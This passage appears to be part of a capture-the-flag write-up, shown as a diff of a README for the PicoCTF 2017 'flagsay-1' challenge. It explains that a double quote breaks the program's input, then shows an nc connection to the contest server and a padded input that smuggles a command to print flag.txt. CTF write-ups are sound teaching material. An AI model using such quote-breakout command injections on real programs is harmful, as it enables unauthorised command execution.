navin-moorthy/Pico-CTF-2017-Write-Up/binary/flagsay-1/README.md

 As seen above, `"` at the end of the input breaks the code.
 Also, we can see the shell in the second and the following lines.

-Then, we can do something like this to break the first line with charac
+Then, we can do something like this to break the first line with characters and the command for the second line, gives the flag

     $ nc shell2017.picoctf.com 12442
 	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"bin/cat flag.txt